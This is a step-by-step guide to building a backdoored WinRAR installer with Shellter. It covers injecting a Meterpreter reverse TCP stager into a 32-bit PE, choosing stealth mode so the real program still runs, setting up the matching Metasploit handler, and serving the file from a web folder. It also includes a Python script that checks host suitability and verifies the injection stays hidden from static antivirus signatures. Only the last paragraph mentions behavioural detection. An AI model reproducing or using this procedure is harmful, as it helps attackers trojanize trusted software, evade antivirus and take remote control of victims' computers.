Creating a Stealthy Backdoor Using Shellter: A Guide
Chapter 1: Introduction to Shellter
Shellter is a dynamic shellcode injector for 32-bit Windows PE files, used to get a payload past antivirus products that rely on static signatures. It does not repack or re-encode the host application. Instead it runs the target, traces the instructions that actually execute, and writes the payload into existing code at a point along that execution flow, so the result carries no packer stub, no added section and no modified entry point, all of which are classic static red flags. The payload can be one of Shellter's built-in Metasploit stagers or a custom one, and the injection point and the junk code wrapped around the payload vary from run to run, so every output file hashes differently and a signature written against one infected binary does not match the next. Choose the host with the same care: a binary that is already packed or carries several executable sections looks suspicious before Shellter touches it, and Shellter will not fix that.
Section 1.1: Setting Up Shellter
After downloading the tool, extract the archive and, optionally, move the extracted directory to /opt:

root@kali:~/Downloads# mv shellter /opt/

Next, download a legitimate Windows executable to act as the host for the backdoor. It must be a 32-bit (x86) PE, since Shellter does not handle 64-bit images, and it should not be packed. In this guide we use "Winrar.exe".

Move "Winrar.exe" into the Shellter directory:

root@kali:~/Downloads# mv Winrar.exe /opt/shellter/

Shellter is itself a 32-bit Windows program, so launch it through Wine (a Wine installation with 32-bit support is required):

root@kali:/opt/shellter# wine shellter.exe
At the start-up, you will see a welcome screen prompting you to select an operation mode. Choose “A” for auto mode and press “Enter.” It will then request the “PE Target:” name, which is the application you wish to bind the backdoor to—in this case, “Winrar.exe.”
Section 1.2: Binding the Backdoor
Once the PE target is set, Shellter asks whether to enable stealth mode. Stealth mode preserves the host's original behaviour: after the payload runs, control returns to the application, so the program still appears to start normally. Without it the payload runs but the original program is not guaranteed to continue. For this demonstration select "N" and move on to payload selection.
Next, you can choose to utilize a listed payload or a custom one. To use a listed payload, type “L” and select one by its index number. For this guide, we will choose “1” for “Meterpreter_Reverse_TCP.”
Finally, enter the LHOST address of the attacking machine and the LPORT the payload should connect back to, then press "Enter". Shellter injects the payload, verifies the result and exits; it does not start a listener for you.
Before running the infected binary, start a matching handler in msfconsole: load exploit/multi/handler, set the payload to windows/meterpreter/reverse_tcp (the 32-bit stager that Shellter's Meterpreter_Reverse_TCP entry corresponds to), set LHOST and LPORT to the same values given to Shellter, and run it. The handler must be up before the target executes the file, or the stager's connection attempt simply fails.
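As an added example (not code from this guide or from the Shellter project), the Python script below covers two checks the steps above leave to the reader: before injection, that a candidate host such as "Winrar.exe" is a plain 32-bit PE that Shellter will accept and is not obviously packed; after injection, that the infected copy kept the entry point and section layout of the clean one (Shellter writes into existing code rather than appending a section) while its code bytes and file hash changed. It parses the PE headers itself with the standard library. The file names in the usage line and the overwrite_in_section() stand-in used for the offline demonstration are assumptions, not Shellter's behaviour.

```python
"""Pre-flight and post-injection checks for a Shellter host binary.

Added example, not code from the guide or the Shellter project. Parses just
enough of the PE format (standard library only) to tell whether a host is a
plain 32-bit PE and whether an injected copy kept its layout while its code
changed. File names in main() and overwrite_in_section() are assumptions.
"""
import hashlib
import struct
import sys

IMAGE_FILE_MACHINE_I386 = 0x14C   # x86: the only machine type Shellter supports
PE32_MAGIC = 0x10B                # 32-bit optional header (PE32+ is 0x20B)
IMAGE_SCN_MEM_EXECUTE = 0x20000000
# A few well-known packer section names; a packed host is a poor choice.
PACKER_SECTION_NAMES = {"UPX0", "UPX1", ".aspack", ".adata", ".petite", ".MPRESS1", ".MPRESS2"}


def parse_pe(data: bytes) -> dict:
    """Return machine type, optional-header magic, entry RVA and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        name, _, vaddr, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "rptr": rptr, "raw": data[rptr:rptr + rsize],
                         "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE)})
    return {"machine": machine, "magic": magic, "entry": entry, "sections": sections}


def check_target(info: dict) -> list:
    """Problems that make a binary an impossible or unwise Shellter host."""
    problems = []
    if info["machine"] != IMAGE_FILE_MACHINE_I386 or info["magic"] != PE32_MAGIC:
        problems.append("not a 32-bit (PE32, x86) image; Shellter only handles those")
    names = [s["name"] for s in info["sections"]]
    if PACKER_SECTION_NAMES & set(names):
        problems.append("section names suggest a packed binary: %s" % names)
    exe = [s["name"] for s in info["sections"] if s["executable"]]
    if len(exe) > 1:
        problems.append("multiple executable sections %s already look suspicious to AV" % exe)
    if not exe:
        problems.append("no executable section to inject into")
    return problems


def compare_images(original: bytes, injected: bytes) -> dict:
    """Report what changed between the clean host and the injected copy."""
    a, b = parse_pe(original), parse_pe(injected)
    key = [(s["name"], s["vaddr"]) for s in a["sections"]]
    same_layout = key == [(s["name"], s["vaddr"]) for s in b["sections"]]
    modified = [s["name"] for s, t in zip(a["sections"], b["sections"])
                if same_layout and s["raw"] != t["raw"]]
    return {"entry_unchanged": a["entry"] == b["entry"],
            "layout_unchanged": same_layout,
            "modified_sections": modified,
            "hash_changed": hashlib.sha256(original).digest() != hashlib.sha256(injected).digest()}


def build_sample_pe(sections, machine=IMAGE_FILE_MACHINE_I386, magic=PE32_MAGIC) -> bytes:
    """Constructed minimal PE (valid headers, not a runnable program) so the checks
    can be exercised offline. sections: list of (name, characteristics, raw bytes)."""
    opt_size, align = 224, 0x200
    raw_ptr = (0x40 + 4 + 20 + opt_size + 40 * len(sections) + align - 1) & ~(align - 1)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<I", opt, 16, 0x1000)                          # entry = first section
    table, body, vaddr = b"", b"", 0x1000
    for name, chars, raw in sections:
        rsize = (len(raw) + align - 1) & ~(align - 1)
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(raw), vaddr,
                             rsize, raw_ptr + len(body), 0, 0, 0, 0, chars)
        body += raw.ljust(rsize, b"\0")
        vaddr += max(rsize, 0x1000)
    return (dos + b"PE\0\0" + coff + bytes(opt) + table).ljust(raw_ptr, b"\0") + body


def overwrite_in_section(image: bytes, name: str, offset: int, patch: bytes) -> bytes:
    """Stand-in injector for the offline demo only: overwrite bytes inside an existing
    section so the layout stays the same but the code changes. Not what Shellter does."""
    for s in parse_pe(image)["sections"]:
        if s["name"] == name:
            start = s["rptr"] + offset
            return image[:start] + patch + image[start + len(patch):]
    raise KeyError(name)


if __name__ == "__main__":
    if len(sys.argv) == 3:   # assumed usage: pe_check.py Winrar.orig.exe Winrar.exe
        with open(sys.argv[1], "rb") as f:
            clean = f.read()
        with open(sys.argv[2], "rb") as f:
            injected = f.read()
    else:                    # no files given: run the checks on a constructed sample
        clean = build_sample_pe([(".text", 0x60000020, b"\x90" * 64 + b"\xc3"),
                                 (".data", 0xC0000040, b"constructed data")])
        injected = overwrite_in_section(clean, ".text", 8, b"\xcc" * 16)
    print("host problems:", check_target(parse_pe(clean)) or "none")
    print("after injection:", compare_images(clean, injected))
```

Run it with two paths (the untouched copy you kept and Shellter's output) to check a real pair, or with no arguments to see the checks applied to the constructed sample. A clean Shellter run should report the layout and entry point unchanged and only a code section modified; an added section or a moved entry point means something other than the expected in-place injection happened and the file deserves a closer look before it is delivered.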
Section 1.3: Testing the Backdoor
To test the infected "Winrar.exe", make it reachable from the target, for example by moving it into your web root:

root@kali:/opt/shellter# mv Winrar.exe /var/www/html/Evil-Files/

Download and execute the file on the target machine. The payload runs, connects back to the handler, and a Meterpreter session opens for further interaction and exploitation. Whether the visible WinRAR installer also starts depends on the stealth-mode choice made earlier: with stealth mode enabled the installer proceeds normally while the session runs in the background; with it disabled the original program is not guaranteed to continue, so the target may see nothing at all.
Penetration testers and red teams routinely borrow techniques from malicious software, and Shellter is a clear example: its design descends from entry point obscuring (EPO) and polymorphic file-infector viruses. Its popularity with penetration testers has been matched by adoption among cybercriminals.
Although Shellter was not written with malicious intent, it is a formidable tool in an attacker's hands because of how reliably it evades signature-based antivirus. What it changes is the file on disk; the Meterpreter stager still decodes and runs in memory and still opens an outbound connection, and that behaviour is what products such as CrowdStrike's next-generation antivirus, backed by continuous research, use to identify and neutralize such threats.